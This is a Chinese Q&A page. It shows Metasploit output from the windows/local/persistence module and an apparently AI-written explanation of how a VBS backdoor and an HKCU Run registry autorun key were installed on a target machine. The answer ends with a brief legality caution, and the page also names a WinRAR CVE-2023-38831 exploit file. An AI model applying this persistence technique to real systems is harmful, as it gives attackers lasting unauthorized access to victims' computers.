msf6 exploit(windows/local/persistence) > run [*] Running persistent module against DESKTOP-UL26GPM via session ID: 7 [+] Persistent VBS script written on DESKTOP-UL26GPM to C:\Users\1-2\AppData\Local\Temp\znovHQot.vbs [*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kkapahXyyH [+] Installed autorun on DESKTOP-UL26GPM as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kkapahXyyH [*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DESKTOP-UL26GPM_20230717.4409/DESKTOP-UL26GPM_20230717.4409.rc
时间: 2023-07-24 16:15:19 浏览: 345
MSF_EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831-.txt
根据您提供的Metasploit命令输出,您正在运行`exploit/windows/local/persistence`模块来创建持久性后门。下面是命令的执行结果:
- 持久性VBS脚本已经被写入目标主机 DESKTOP-UL26GPM 的 `C:\Users\1-2\AppData\Local\Temp\znovHQot.vbs` 文件中。
- 后门已经安装在 DESKTOP-UL26GPM 的 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kkapahXyyH 注册表键中,以实现开机自启。
- Meterpreter RC 文件 `/home/kali/.msf4/logs/persistence/DESKTOP-UL26GPM_20230717.4409/DESKTOP-UL26GPM_20230717.4409.rc` 已经被清理。
上述操作将在目标主机上创建一个持久性后门,以确保在系统重新启动后自动运行恶意脚本。请注意,在进行此类操作之前,确保您已经获得合法授权,并且仅在合规和合法的环境中进行。同时,务必了解和遵守当地法律法规。
阅读全文